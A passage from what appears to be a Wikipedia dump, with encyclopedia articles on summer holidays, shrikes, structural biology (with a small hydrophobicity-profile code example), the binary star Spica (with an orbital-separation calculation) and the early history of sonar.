in February and March and a peak in early September. In the North Indian basin, storms are most common from April to December, with peaks in May and November. In the Southern Hemisphere, the tropical cyclone season runs from the start of November until the end of April, with peaks in mid-February to early March. Thunderstorm season in the United States and Canada runs from spring through summer, but can sometimes extend as late as October or even November. These storms can produce hail, strong winds and tornadoes, usually during the afternoon and evening. Holidays School breaks Schools and universities typically have a summer break to take advantage of the warmer weather and longer days. In almost all countries, children are out of school during this time of year for summer break, although dates vary. Many families will take holidays for a week or two over the summer, particularly in Southern Hemisphere Western countries with statutory Christmas and New Year holidays. In the United States, public schools usually end in late May, around Memorial Day weekend, while colleges finish in early May. Public schools traditionally resume near Labor Day, while higher institutions often resume in mid-August. In England and Wales, school ends in mid-July and resumes again in early September. In Scotland, the summer holiday begins in late June and ends in mid-to-late August. Similarly, in Canada the summer holiday starts on the last or second-last Friday in June and ends in late August or on the first Tuesday of September; where that date falls before Labour Day, it ends on the second Tuesday of the month. 
In Russia, the summer holiday begins at the end of May and ends on 31 August. In the Southern Hemisphere, school summer holiday dates include the major holidays of Christmas and New Year's Day. School summer holidays in Australia, New Zealand and South Africa begin in early December and end in early February, with dates varying between states. In South Africa, the new school year usually starts during the second week of January, thus aligning the academic year with the calendar year. In India, school ends in late April and resumes in early or mid-June. In Cameroon and Nigeria, schools usually start a summer vacation in mid-July and resume in the later weeks of September or the first week of October. Public holidays A wide range of public holidays fall during summer, including: Northern Hemisphere Bank holidays in the United Kingdom and Ireland Bastille Day, National Day of France (14 July) Belgian National Day (21 July) Canada Day (1 July) Festa della Repubblica, Italian national day and republic day (2 June) Independence Day (Jordan) (25 May) Independence Day (Pakistan) (14 August) Independence Day (India) (15 August) Independence Day (Indonesia) (17 August) Independence Day (Malaysia) (31 August) Independence Day (United States) (4 July) Juneteenth (United States) (19 June) King's Official Birthday (United Kingdom and some Commonwealth countries) (third Saturday in June) Memorial Day (United States) or Victoria Day (Canada) through Labor Day National Day of Singapore (9 August) National Day of Sweden (6 June) and Midsummer, sometimes referred to as the "alternative National Day" Ólavsøka, Faroe Islands (29 July) Swiss National Day (1 August) Victory Day (Turkey) (30 August) Southern Hemisphere Australia Day (26 January) Christmas Day (25 December) and Boxing Day (26 December) in many countries New Year's Day (1 January) and the following day (2 January) in many countries Waitangi Day (6 February) in New Zealand Activities People generally take advantage of the high temperatures by spending more time outdoors during summer. Activities such as travelling to the beach and picnics occur during the summer months. Sports including cricket, association football (soccer), horse racing, basketball, American football, volleyball, skateboarding, baseball, softball, tennis and golf are played. Water sports are also popular, including water skiing, wakeboarding, swimming, surfing, tubing and water polo. The modern Olympics have been held during the summer months every four years since 1896; the 2000 Summer Olympics, in Sydney, were held in the local spring, and the 2016 Summer Olympics, in Rio de Janeiro, were held in the local winter. In the United States, many television shows made for children are released during the summer, as children are off school. The music and film industries generally experience higher returns during the summer than at other times of the year and market their summer hits accordingly. Summer is also a popular season for releasing animated movies in theaters. With many schools closed, especially in Western countries, travel and vacationing tend to peak during the summer. Teenagers and university students often take summer jobs, and business activity for the recreation, tourism, restaurant, and retail industries reaches its peak.
Physical sciences
Seasons
null
29394
https://en.wikipedia.org/wiki/Shrike
Shrike
Shrikes are passerine birds of the family Laniidae. The family is composed of 34 species in two genera. The family name, and that of the larger genus, Lanius, is derived from the Latin word for "butcher", and some shrikes are also known as butcherbirds because of their habit, particularly among males, of impaling prey onto plant spines within their territories. These larders have multiple functions, attracting females and serving as food stores. The common English name shrike is from Old English scrīc, alluding to the shrike's shriek-like call. Taxonomy The family Laniidae was introduced (as the subfamily Lanidia) in 1815 by the French polymath Constantine Samuel Rafinesque. The type genus Lanius had been introduced by Carl Linnaeus in 1758. As currently constituted, the family contains 34 species in two genera. It includes the genus Eurocephalus with the two white-crowned shrikes. A molecular phylogenetic study published in 2023 found that the white-crowned shrikes were more closely related to the crows in the family Corvidae than to the Laniidae, and the authors proposed that the genus Eurocephalus should be moved to its own family, Eurocephalidae. Distribution, migration, and habitat Most shrike species have a Eurasian and African distribution, with just two breeding in North America (the loggerhead and northern shrikes). No members of this family occur in South America or Australia, although one species reaches New Guinea. The shrikes vary in the extent of their ranges: some species, such as the great grey shrike, range across the Northern Hemisphere, while the São Tomé fiscal (or Newton's fiscal) is restricted to the island of São Tomé. They inhabit open habitats, especially steppe and savannah, though a few species are forest dwellers that seldom occur in open habitats. Some species breed in northern latitudes during the summer, then migrate to warmer climes for the winter. Description Shrikes are medium-sized birds with grey, brown, or black-and-white plumage. Most species are between and in size; however, the genus Corvinella, with its extremely elongated tail-feathers, may reach up to in length. Their beaks are hooked, like those of a bird of prey, reflecting their carnivorous nature; their calls are strident. Behaviour Male shrikes are known for their habit of catching insects and small vertebrates and impaling them on thorns, branches, the spikes on barbed-wire fences, or any available sharp point. These stores serve as a cache so that the shrike can return to the uneaten portions at a later time. The primary function of conspicuously impaling prey on thorny vegetation is, however, thought to be for males to display their fitness and the quality of the territory they hold to prospective mates; the impaling behaviour increases at the onset of the breeding season. Female shrikes have been known to impale prey, but primarily to assist in dismembering it. This behaviour may also serve secondarily as an adaptation to eating the toxic lubber grasshopper, Romalea microptera: the bird waits 1–2 days for the toxins within the grasshopper to degrade before eating it. Loggerhead shrikes kill vertebrates by using their beaks to grab or pierce the neck and violently shake their prey. Shrikes are territorial, and these territories are defended from other pairs. In migratory species, a breeding territory is defended in the breeding grounds and a smaller feeding territory is established during migration and in the wintering grounds. 
Where several species of shrikes exist together, competition for territories can be intense. Shrikes make regular use of exposed perch sites, where they adopt a conspicuous upright stance. These sites are used to watch for prey and to advertise their presence to rivals. Shrikes vocally imitate their prey to lure them within range for capture. In 1575, this was noted by the English poet George Turberville: "She will stand at perch upon some tree or poste, and there make an exceedingly lamentable crye. . . . All to make other fowles to thinke that she is very much distressed. . . whereupon the credulous sellie birds do flocke together at her call. If any happen to approach near her, she. . . ceazeth on them, and devoureth them (ungrateful subtill fowle)." Breeding Shrikes are generally monogamous breeders, although polygyny has been recorded in some species. Co-operative breeding, where younger birds help their parents raise the next generation of young, has been recorded in both species of the genera Eurocephalus and Corvinella, as well as in one species of Lanius. Males attract females to their territory with well-stocked caches, which may include inedible but brightly coloured items. During courtship, the male performs a ritualised dance which includes actions that mimic the skewering of prey on thorns, and feeds the female. Shrikes make simple, cup-shaped nests from twigs and grasses, in bushes and the lower branches of trees. Species in taxonomic order FAMILY: LANIIDAE
Biology and health sciences
Corvoidea
null
29400
https://en.wikipedia.org/wiki/Structural%20biology
Structural biology
Structural biology, as defined by the Journal of Structural Biology, deals with structural analysis of living material (formed, composed of, and/or maintained and refined by living cells) at every level of organization. Early structural biologists throughout the 19th and early 20th centuries were able to study structures only to the limit of the naked eye's visual acuity, aided by magnifying glasses and light microscopes. In the 20th century, a variety of experimental techniques were developed to examine the 3D structures of biological molecules. The most prominent techniques are X-ray crystallography, nuclear magnetic resonance, and electron microscopy. Through the discovery of X-rays and their application to protein crystals, structural biology was revolutionized, as scientists could now obtain the three-dimensional structures of biological molecules in atomic detail. Likewise, NMR spectroscopy allowed information about protein structure and dynamics to be obtained. Finally, in the 21st century, electron microscopy also saw a drastic revolution with the development of more coherent electron sources, aberration correction for electron microscopes, and reconstruction software that enabled the successful implementation of high resolution cryo-electron microscopy, thereby permitting the study of individual proteins and molecular complexes in three dimensions at angstrom resolution. With the development of these three techniques, the field of structural biology expanded and also became a branch of molecular biology, biochemistry, and biophysics concerned with the molecular structure of biological macromolecules (especially proteins, made up of amino acids, RNA or DNA, made up of nucleotides, and membranes, made up of lipids), how they acquire the structures they have, and how alterations in their structures affect their function. This subject is of great interest to biologists because macromolecules carry out most of the functions of cells, and it is only by coiling into specific three-dimensional shapes that they are able to perform these functions. This architecture, the "tertiary structure" of molecules, depends in a complicated way on each molecule's basic composition, or "primary structure." At lower resolutions, tools such as FIB-SEM tomography have allowed for greater understanding of cells and their organelles in three dimensions, and how each hierarchical level of various extracellular matrices contributes to function (for example in bone). In the past few years it has also become possible to predict highly accurate physical molecular models to complement the experimental study of biological structures. Computational techniques such as molecular dynamics simulations can be used in conjunction with empirical structure determination strategies to extend and study protein structure, conformation and function. History In 1912, Max von Laue directed X-rays at crystallized copper sulfate, generating a diffraction pattern. These experiments led to the development of X-ray crystallography, and its usage in exploring biological structures. In 1951, Rosalind Franklin and Maurice Wilkins used X-ray diffraction patterns to capture the first image of deoxyribonucleic acid (DNA). Francis Crick and James Watson modeled the double helical structure of DNA using this same technique in 1953 and received the Nobel Prize in Physiology or Medicine along with Wilkins in 1962.
Pepsin was the first protein to be crystallized for use in X-ray diffraction, by Theodore Svedberg, who received the 1926 Nobel Prize in Chemistry. The first tertiary protein structure, that of myoglobin, was published in 1958 by John Kendrew. During this time, modeling of protein structures was done using balsa wood or wire models. With the invention of modeling software such as CCP4 in the late 1970s, modeling is now done with computer assistance. Recent developments in the field have included the generation of X-ray free electron lasers, allowing analysis of the dynamics and motion of biological molecules, and the use of structural biology in assisting synthetic biology. In the late 1930s and early 1940s, the combination of work done by Isidor Rabi, Felix Bloch, and Edward Mills Purcell led to the development of nuclear magnetic resonance (NMR). Currently, solid-state NMR is widely used in the field of structural biology to determine the structure and dynamic nature of proteins (protein NMR). In 1990, Richard Henderson produced the first three-dimensional, high resolution image of bacteriorhodopsin using cryogenic electron microscopy (cryo-EM). Since then, cryo-EM has emerged as an increasingly popular technique to determine three-dimensional, high resolution structures of biological molecules. More recently, computational methods have been developed to model and study biological structures. For example, molecular dynamics (MD) is commonly used to analyze the dynamic movements of biological molecules. In 1975, the first simulation of a biological folding process using MD was published in Nature. Recently, protein structure prediction was significantly improved by a new machine learning method called AlphaFold. Some claim that computational approaches are starting to lead the field of structural biology research. Techniques Biomolecules are too small to see in detail even with the most advanced light microscopes. The methods that structural biologists use to determine their structures generally involve measurements on vast numbers of identical molecules at the same time. These methods include mass spectrometry, macromolecular crystallography, neutron diffraction, proteolysis, nuclear magnetic resonance spectroscopy of proteins (NMR), electron paramagnetic resonance (EPR), cryogenic electron microscopy (cryoEM), electron crystallography and microcrystal electron diffraction, multiangle light scattering, small angle scattering, ultrafast laser spectroscopy, anisotropic terahertz microspectroscopy, two-dimensional infrared spectroscopy, and dual-polarization interferometry and circular dichroism. Most often researchers use them to study the "native states" of macromolecules. But variations on these methods are also used to watch nascent or denatured molecules assume or reassume their native states. See protein folding. A third approach that structural biologists take to understanding structure is to use bioinformatics to look for patterns among the diverse sequences that give rise to particular shapes. Researchers often can deduce aspects of the structure of integral membrane proteins based on the membrane topology predicted by hydrophobicity analysis. See protein structure prediction. Applications Structural biologists have made significant contributions towards understanding the molecular components and mechanisms underlying human diseases.
For example, cryo-EM and ssNMR have been used to study the aggregation of amyloid fibrils, which are associated with Alzheimer's disease, Parkinson's disease, and type II diabetes. In addition to amyloid proteins, scientists have used cryo-EM to produce high resolution models of tau filaments in the brain of Alzheimer's patients which may help develop better treatments in the future. Structural biology tools can also be used to explain interactions between pathogens and hosts. For example, structural biology tools have enabled virologists to understand how the HIV envelope allows the virus to evade human immune responses. Structural biology is also an important component of drug discovery. Scientists can identify targets using genomics, study those targets using structural biology, and develop drugs that are suited for those targets. Specifically, ligand-NMR, mass spectrometry, and X-ray crystallography are commonly used techniques in the drug discovery process. For example, researchers have used structural biology to better understand Met, a protein encoded by a protooncogene that is an important drug target in cancer. Similar research has been conducted for HIV targets to treat people with AIDS. Researchers are also developing new antimicrobials for mycobacterial infections using structure-driven drug discovery.
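The hydrophobicity analysis mentioned in the techniques discussion above lends itself to a short worked example. The following is a minimal sketch, not any particular published tool: it computes a sliding-window Kyte–Doolittle hydropathy profile, with the 19-residue window, the ~1.6 threshold, and the toy sequence all being conventional or illustrative choices.

```python
# Minimal sketch of a Kyte-Doolittle hydrophobicity profile, the kind of
# analysis used to predict membrane-spanning segments of a protein.
# The window size (19) is a common choice for transmembrane helices;
# the example sequence below is a made-up toy, not a real protein.

KYTE_DOOLITTLE = {
    'A': 1.8, 'R': -4.5, 'N': -3.5, 'D': -3.5, 'C': 2.5,
    'Q': -3.5, 'E': -3.5, 'G': -0.4, 'H': -3.2, 'I': 4.5,
    'L': 3.8, 'K': -3.9, 'M': 1.9, 'F': 2.8, 'P': -1.6,
    'S': -0.8, 'T': -0.7, 'W': -0.9, 'Y': -1.3, 'V': 4.2,
}

def hydrophobicity_profile(sequence: str, window: int = 19) -> list[float]:
    """Mean hydropathy of each full window along the sequence."""
    scores = [KYTE_DOOLITTLE[aa] for aa in sequence]
    return [
        sum(scores[i:i + window]) / window
        for i in range(len(scores) - window + 1)
    ]

if __name__ == "__main__":
    # A hydrophobic stretch flanked by polar residues (toy example).
    seq = "MKTAYDE" + "LLVVAAILLVIAGLLVVAA" + "KRDEQNS"
    for i, value in enumerate(hydrophobicity_profile(seq)):
        # Windows averaging above ~1.6 are conventionally flagged as
        # candidate transmembrane segments in Kyte-Doolittle analysis.
        flag = "  <- candidate TM segment" if value > 1.6 else ""
        print(f"window starting at residue {i + 1}: {value:+.2f}{flag}")
```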
Biology and health sciences
Biochemistry
Biology
29409
https://en.wikipedia.org/wiki/Spica
Spica
Spica is the brightest object in the constellation of Virgo and one of the 20 brightest stars in the night sky. It has the Bayer designation α Virginis, which is Latinised to Alpha Virginis and abbreviated Alpha Vir or α Vir. Analysis of its parallax shows that it is located 250 light-years from the Sun. It is a spectroscopic binary star and rotating ellipsoidal variable: a system whose two stars are so close together they are egg-shaped rather than spherical, and can only be separated by their spectra. The primary is a blue giant and a variable star of the Beta Cephei type. Spica, along with Arcturus and Denebola (or Regulus, depending on the source), forms the Spring Triangle asterism, and, by extension, is also part of the Great Diamond together with the star Cor Caroli. Nomenclature In 2016, the International Astronomical Union organized a Working Group on Star Names (WGSN) to catalog and standardize proper names for stars. The WGSN's first bulletin of July 2016 included a table of the first two batches of names approved by the WGSN, which included Spica for this star. It is now so entered in the IAU Catalog of Star Names. The name is derived from the Latin spīca virginis "the virgin's ear of [wheat] grain". It was also anglicized as Virgin's Spike. α Virginis (Latinised to Alpha Virginis) is the system's Bayer designation. Johann Bayer cited the name Arista. Other traditional names are Azimech, from Arabic السماك الأعزل al-simāk al-ʼaʽzal 'the unarmed simāk' (of unknown meaning; cf. Eta Boötis); Alarph, Arabic for 'the grape-gatherer' or 'gleaner'; and Sumbalet (Sombalet, Sembalet and variants), from Arabic سنبلة sunbulah "ear of grain". In Chinese, the asterism known as the Horn consists of Spica and ζ Virginis; the Chinese name for Spica itself denotes the first star of the Horn. In Hindu astronomy, Spica corresponds to the Nakshatra Chitrā. Observational history As one of the nearest massive binary star systems to the Sun, Spica has been the subject of many observational studies. Spica is believed to be the star that gave Hipparchus the data that led him to discover the precession of the equinoxes. A temple to Menat (an early Hathor) at Thebes was oriented with reference to Spica when it was built in 3200 BC, and, over time, precession slowly but noticeably changed Spica's location relative to the temple. Nicolaus Copernicus made many observations of Spica with his home-made triquetrum for his researches on precession. Observation Spica is 2.06 degrees from the ecliptic and can be occulted by the Moon and sometimes by planets. The last planetary occultation of Spica occurred when Venus passed in front of the star (as seen from Earth) on November 10, 1783. The next occultation will occur on September 2, 2197, when Venus again passes in front of Spica. The Sun passes a little more than 2° north of Spica around October 16 every year, and the star's heliacal rising occurs about two weeks later. Every 8 years, Venus passes Spica around the time of the star's heliacal rising, as in 2009 when it passed 3.5° north of the star on November 3. A method of finding Spica is to follow the arc of the handle of the Big Dipper (or Plough) to Arcturus, and then continue on the same angular distance to Spica. This can be recalled by the mnemonic phrase, "arc to Arcturus and spike to Spica."
Stars that can set (those not circumpolar for the viewer) culminate at midnight when at opposition, meaning they can be viewed from dusk until dawn (except from polar regions experiencing midnight sun). This applies to α Virginis on 12 April in the current astronomical epoch. Physical properties Spica is a close binary star whose components orbit each other every four days. They stay close enough together that they cannot be resolved as two stars through a telescope. The changes in the orbital motion of this pair result in a Doppler shift in the absorption lines of their respective spectra, making them a double-lined spectroscopic binary. Initially, the orbital parameters for this system were inferred using spectroscopic measurements. Between 1966 and 1970, the Narrabri Stellar Intensity Interferometer was used to observe the pair and to directly measure the orbital characteristics and the angular diameter of the primary, which was found to be , and the angular size of the semi-major axis of the orbit was found to be only slightly larger at . Spica is a rotating ellipsoidal variable, which is a non-eclipsing close binary star system where the stars are mutually distorted through their gravitational interaction. This effect causes the apparent magnitude of the star system to vary by 0.03 over an interval that matches the orbital period. This slight dip in magnitude is barely noticeable visually. Both stars rotate faster than their mutual orbital period. This lack of synchronization and the high ellipticity of their orbit may indicate that this is a young star system. Over time, the mutual tidal interaction of the pair may lead to rotational synchronization and orbit circularization. Spica is a polarimetric variable, first discovered to be such in 2016. The majority of the polarimetric signal is the result of the reflection of the light from one star off the other (and vice versa). The two stars in Spica were the first ever to have their reflectivity (or geometric albedo) measured. The geometric albedos of Spica A and B are, respectively, 3.61 percent and 1.36 percent, values that are low compared to planets. The MK spectral classification of Spica is typically given as an early B-type main-sequence star. Individual spectral types for the two components are difficult to assign accurately, especially for the secondary due to the Struve–Sahade effect. The Bright Star Catalogue derived a spectral class of B2III-IV for the primary and B4-7V for the secondary, but later studies have given various different values. The primary star has a stellar classification of B2III-IV. The luminosity class matches the spectrum of a star that is midway between a subgiant and a giant star, and it is no longer a main-sequence star. The evolutionary stage has been calculated to be near or slightly past the end of the main-sequence phase. This is a massive star with more than 10 times the mass of the Sun and seven times its radius. The bolometric luminosity of the primary is about 20,500 times that of the Sun, and nine times the luminosity of its companion. The primary is one of the nearest stars to the Sun that has enough mass to end its life in a Type II supernova explosion. However, since Spica has only recently left the main sequence, this event is not likely to occur for several more million years. The primary is classified as a Beta Cephei variable star that varies in brightness over a 0.1738-day period.
The spectrum shows a radial velocity variation with the same period, indicating that the surface of the star is regularly pulsating outward and then contracting. This star is rotating rapidly, with a rotational velocity of 199 km/s along the equator. The secondary member of this system is one of the few stars whose spectrum is affected by the Struve–Sahade effect. This is an anomalous change in the strength of the spectral lines over the course of an orbit, where the lines become weaker as the star is moving away from the observer. It may be caused by a strong stellar wind from the primary scattering the light from the secondary when it is receding. This star is smaller than the primary, with about 4 times the mass of the Sun and 3.6 times the Sun's radius. Its stellar classification is B4-7 V, making this a main-sequence star. In culture A rocket and a crew capsule designed and under development by Copenhagen Suborbitals, a crowd-funded space program, are both named Spica. Spica aims to make Denmark the fourth country to launch its own astronaut into space, after Russia, the US and China. Spica is one of the Behenian fixed stars. In his Three Books of Occult Philosophy, Cornelius Agrippa attributes Spica's kabbalistic symbol to Hermes Trismegistus.
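As a rough check on the scale of the system described above, Kepler's third law links the four-day orbital period to the stars' separation. The sketch below is a back-of-envelope estimate, not a published figure; the masses of roughly 10 and 4 solar masses are the approximate values quoted in this article, and published values differ somewhat.

```python
# Back-of-envelope estimate of the separation of the two stars in Spica
# from Kepler's third law: a^3 = G * (M1 + M2) * P^2 / (4 * pi^2).
# Masses (~10 and ~4 solar masses) and the ~4-day period are the rough
# values quoted in the text above.
import math

G = 6.674e-11          # gravitational constant, m^3 kg^-1 s^-2
M_SUN = 1.989e30       # solar mass, kg
AU = 1.496e11          # astronomical unit, m

def orbital_separation(m1_solar: float, m2_solar: float, period_days: float) -> float:
    """Semi-major axis of the relative orbit, in metres."""
    m_total = (m1_solar + m2_solar) * M_SUN
    period_s = period_days * 86400.0
    return (G * m_total * period_s**2 / (4 * math.pi**2)) ** (1 / 3)

a = orbital_separation(10.0, 4.0, 4.0)
print(f"separation ~ {a:.2e} m ~ {a / AU:.2f} AU")
# ~0.12 AU: the stars are far closer together than Mercury is to the Sun,
# consistent with their tidal distortion into ellipsoidal shapes.
```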
Physical sciences
Notable stars
Astronomy
29438
https://en.wikipedia.org/wiki/Sonar
Sonar
Sonar (sound navigation and ranging or sonic navigation and ranging) is a technique that uses sound propagation (usually underwater, as in submarine navigation) to navigate, measure distances (ranging), communicate with or detect objects on or under the surface of the water, such as other vessels. "Sonar" can refer to one of two types of technology: passive sonar means listening for the sound made by vessels; active sonar means emitting pulses of sounds and listening for echoes. Sonar may be used as a means of acoustic location and of measurement of the echo characteristics of "targets" in the water. Acoustic location in air was used before the introduction of radar. Sonar may also be used for robot navigation, and sodar (an upward-looking in-air sonar) is used for atmospheric investigations. The term sonar is also used for the equipment used to generate and receive the sound. The acoustic frequencies used in sonar systems vary from very low (infrasonic) to extremely high (ultrasonic). The study of underwater sound is known as underwater acoustics or hydroacoustics. The first recorded use of the technique was in 1490 by Leonardo da Vinci, who used a tube inserted into the water to detect vessels by ear. It was developed during World War I to counter the growing threat of submarine warfare, with an operational passive sonar system in use by 1918. Modern active sonar systems use an acoustic transducer to generate a sound wave which is reflected from target objects. History Although some animals (dolphins, bats, some shrews, and others) have used sound for communication and object detection for millions of years, use by humans in the water was initially recorded by Leonardo da Vinci in 1490: a tube inserted into the water was said to be used to detect vessels by placing an ear to the tube. In the late 19th century, an underwater bell was used as an ancillary to lighthouses or lightships to provide warning of hazards. The use of sound to "echo-locate" underwater in the same way as bats use sound for aerial navigation seems to have been prompted by the Titanic disaster of 1912. The world's first patent for an underwater echo-ranging device was filed at the British Patent Office by English meteorologist Lewis Fry Richardson a month after the sinking of Titanic, and the German physicist Alexander Behm obtained a patent for an echo sounder in 1913. The Canadian engineer Reginald Fessenden, while working for the Submarine Signal Company in Boston, Massachusetts, built an experimental system beginning in 1912, a system later tested in Boston Harbor, and finally in 1914 from the U.S. Revenue Cutter Miami on the Grand Banks off Newfoundland. In that test, Fessenden demonstrated depth sounding, underwater communications (Morse code) and echo ranging (detecting an iceberg at range). The "Fessenden oscillator", operated at about 500 Hz frequency, was unable to determine the bearing of the iceberg due to the 3-metre wavelength and the small dimension of the transducer's radiating face (less than a wavelength in diameter). The ten Montreal-built British H-class submarines launched in 1915 were equipped with Fessenden oscillators. During World War I the need to detect submarines prompted more research into the use of sound. The British made early use of underwater listening devices called hydrophones, while the French physicist Paul Langevin, working with a Russian immigrant electrical engineer, Constantin Chilowsky, worked on the development of active sound devices for detecting submarines in 1915.
Although piezoelectric and magnetostrictive transducers later superseded the electrostatic transducers they used, this work influenced future designs. Lightweight sound-sensitive plastic film and fibre optics have been used for hydrophones, while Terfenol-D and lead magnesium niobate (PMN) have been developed for projectors. ASDIC In 1916, under the British Board of Invention and Research, Canadian physicist Robert William Boyle took on the active sound detection project with A. B. Wood, producing a prototype for testing in mid-1917. This work for the Anti-Submarine Division of the British Naval Staff was undertaken in utmost secrecy, and used quartz piezoelectric crystals to produce the world's first practical underwater active sound detection apparatus. To maintain secrecy, no mention of sound experimentation or quartz was made – the word used to describe the early work ("supersonics") was changed to "ASD"ics, and the quartz material was given a similar cover name: "ASD" for "Anti-Submarine Division", hence the British acronym ASDIC. In 1939, in response to a question from the Oxford English Dictionary, the Admiralty made up the story that it stood for "Allied Submarine Detection Investigation Committee", and this is still widely believed, though no committee bearing this name has been found in the Admiralty archives. By 1918, Britain and France had built prototype active systems. The British tested their ASDIC in 1920 and started production in 1922. The 6th Destroyer Flotilla had ASDIC-equipped vessels in 1923. An anti-submarine school, HMS Osprey, and a training flotilla of four vessels were established at Portland in 1924. By the outbreak of World War II, the Royal Navy had five sets for different surface ship classes, and others for submarines, incorporated into a complete anti-submarine system. The effectiveness of early ASDIC was hampered by the use of the depth charge as an anti-submarine weapon. This required an attacking vessel to pass over a submerged contact before dropping charges over the stern, resulting in a loss of ASDIC contact in the moments leading up to attack. The hunter was effectively firing blind, during which time a submarine commander could take evasive action. This situation was remedied with new tactics and new weapons. The tactical improvements developed by Frederic John Walker included the creeping attack. Two anti-submarine ships were needed for this (usually sloops or corvettes). The "directing ship" tracked the target submarine on ASDIC from a position about 1500 to 2000 yards behind the submarine. The second ship, with her ASDIC turned off and running at 5 knots, started an attack from a position between the directing ship and the target. This attack was controlled by radio telephone from the directing ship, based on their ASDIC and the range (by rangefinder) and bearing of the attacking ship. As soon as the depth charges had been released, the attacking ship left the immediate area at full speed. The directing ship then entered the target area and also released a pattern of depth charges. The low speed of the approach meant the submarine could not predict when depth charges were going to be released. Any evasive action was detected by the directing ship and steering orders to the attacking ship given accordingly. The low speed of the attack had the advantage that the German acoustic torpedo was not effective against a warship travelling so slowly.
A variation of the creeping attack was the "plaster" attack, in which three attacking ships working in a close line abreast were directed over the target by the directing ship. The new weapons to deal with the ASDIC blind spot were "ahead-throwing weapons", such as Hedgehogs and later Squids, which projected warheads at a target ahead of the attacker and still in ASDIC contact. These allowed a single escort to make better aimed attacks on submarines. Developments during the war resulted in British ASDIC sets that used several different shapes of beam, continuously covering blind spots. Later, acoustic torpedoes were used. Early in World War II (September 1940), British ASDIC technology was transferred for free to the United States. Research on ASDIC and underwater sound was expanded in the UK and in the US. Many new types of military sound detection were developed. These included sonobuoys, first developed by the British in 1944 under the codename High Tea, dipping/dunking sonar and mine-detection sonar. This work formed the basis for post-war developments related to countering the nuclear submarine. SONAR During the 1930s American engineers developed their own underwater sound-detection technology, and important discoveries were made, such as the existence of thermoclines and their effects on sound waves. Americans began to use the term SONAR for their systems, coined by Frederick Hunt to be the equivalent of RADAR. US Navy Underwater Sound Laboratory In 1917, the US Navy acquired J. Warren Horton's services for the first time. On leave from Bell Labs, he served the government as a technical expert, first at the experimental station at Nahant, Massachusetts, and later at US Naval Headquarters, in London, England. At Nahant he applied the newly developed vacuum tube, then associated with the formative stages of the field of applied science now known as electronics, to the detection of underwater signals. As a result, the carbon button microphone, which had been used in earlier detection equipment, was replaced by the precursor of the modern hydrophone. Also during this period, he experimented with methods for towing detection. This was due to the increased sensitivity of his device. The principles are still used in modern towed sonar systems. To meet the defense needs of Great Britain, he was sent to England to install in the Irish Sea bottom-mounted hydrophones connected to a shore listening post by submarine cable. While this equipment was being loaded on the cable-laying vessel, World War I ended and Horton returned home. During World War II, he continued to develop sonar systems that could detect submarines, mines, and torpedoes. He published Fundamentals of Sonar in 1957 as chief research consultant at the US Navy Underwater Sound Laboratory. He held this position until 1959 when he became technical director, a position he held until mandatory retirement in 1963. Materials and designs in the US and Japan There was little progress in US sonar from 1915 to 1940. In 1940, US sonars typically consisted of a magnetostrictive transducer and an array of nickel tubes connected to a 1-foot-diameter steel plate attached back-to-back to a Rochelle salt crystal in a spherical housing. This assembly penetrated the ship hull and was manually rotated to the desired angle. The piezoelectric Rochelle salt crystal had better parameters, but the magnetostrictive unit was much more reliable. 
High losses to US merchant supply shipping early in World War II led to large scale high priority US research in the field, pursuing both improvements in magnetostrictive transducer parameters and Rochelle salt reliability. Ammonium dihydrogen phosphate (ADP), a superior alternative, was found as a replacement for Rochelle salt; the first application was a replacement of the 24 kHz Rochelle-salt transducers. Within nine months, Rochelle salt was obsolete. The ADP manufacturing facility grew from a few dozen personnel in early 1940 to several thousand in 1942. One of the earliest applications of ADP crystals was hydrophones for acoustic mines; the crystals were specified for low-frequency cutoff at 5 Hz, withstanding mechanical shock when deployed from aircraft, and the ability to survive neighbouring mine explosions. One of the key features of ADP reliability is its zero-aging characteristic; the crystal keeps its parameters even over prolonged storage. Another application was for acoustic homing torpedoes. Two pairs of directional hydrophones were mounted on the torpedo nose, in the horizontal and vertical plane; the difference signals from the pairs were used to steer the torpedo left-right and up-down. A countermeasure was developed: the targeted submarine discharged an effervescent chemical, and the torpedo went after the noisier fizzy decoy. The counter-countermeasure was a torpedo with active sonar – a transducer was added to the torpedo nose, and the microphones were listening for its reflected periodic tone bursts. The transducers comprised identical rectangular crystal plates arranged in diamond-shaped areas in staggered rows. Passive sonar arrays for submarines were developed from ADP crystals. Several crystal assemblies were arranged in a steel tube, vacuum-filled with castor oil, and sealed. The tubes then were mounted in parallel arrays. The standard US Navy scanning sonar at the end of World War II operated at 18 kHz, using an array of ADP crystals. The desired longer range, however, required the use of lower frequencies. The required dimensions were too big for ADP crystals, so in the early 1950s magnetostrictive and barium titanate piezoelectric systems were developed, but these had problems achieving uniform impedance characteristics, and the beam pattern suffered. Barium titanate was then replaced with more stable lead zirconate titanate (PZT), and the frequency was lowered to 5 kHz. The US fleet used this material in the AN/SQS-23 sonar for several decades. The SQS-23 sonar first used magnetostrictive nickel transducers, but these weighed several tons, and nickel was expensive and considered a critical material; piezoelectric transducers were therefore substituted. The sonar was a large array of 432 individual transducers. At first, the transducers were unreliable, showing mechanical and electrical failures and deteriorating soon after installation; they were also produced by several vendors, had different designs, and their characteristics were different enough to impair the array's performance. The policy of allowing repair of individual transducers was then abandoned, and "expendable modular design", sealed non-repairable modules, was chosen instead, eliminating the problem with seals and other extraneous mechanical parts. The Imperial Japanese Navy at the onset of World War II used projectors based on quartz.
These were big and heavy, especially if designed for lower frequencies; the one for the Type 91 set, operating at 9 kHz, had a diameter of and was driven by an oscillator with 5 kW power and 7 kV of output amplitude. The Type 93 projectors consisted of solid sandwiches of quartz, assembled into spherical cast iron bodies. The Type 93 sonars were later replaced with Type 3, which followed German design and used magnetostrictive projectors; the projectors consisted of two rectangular identical independent units in a cast-iron rectangular body about . The exposed area was half the wavelength wide and three wavelengths high. The magnetostrictive cores were made from 4 mm stampings of nickel, and later of an iron-aluminium alloy with aluminium content between 12.7% and 12.9%. The power was provided from a 2 kW source at 3.8 kV, with polarization from a 20 V, 8 A DC source. The passive hydrophones of the Imperial Japanese Navy were based on moving-coil designs, Rochelle salt piezo transducers, and carbon microphones. Later developments in transducers Magnetostrictive transducers were pursued after World War II as an alternative to piezoelectric ones. Nickel scroll-wound ring transducers were used for high-power low-frequency operations, with size up to in diameter, probably the largest individual sonar transducers ever. The advantage of metals is their high tensile strength and low input electrical impedance, but they have electrical losses and lower coupling coefficient than PZT, whose tensile strength can be increased by prestressing. Other materials were also tried; nonmetallic ferrites were promising for their low electrical conductivity, resulting in low eddy-current losses, and Metglas offered a high coupling coefficient, but they were inferior to PZT overall. In the 1970s, compounds of rare earths and iron were discovered with superior magnetomechanic properties, namely the Terfenol-D alloy. This made possible new designs, 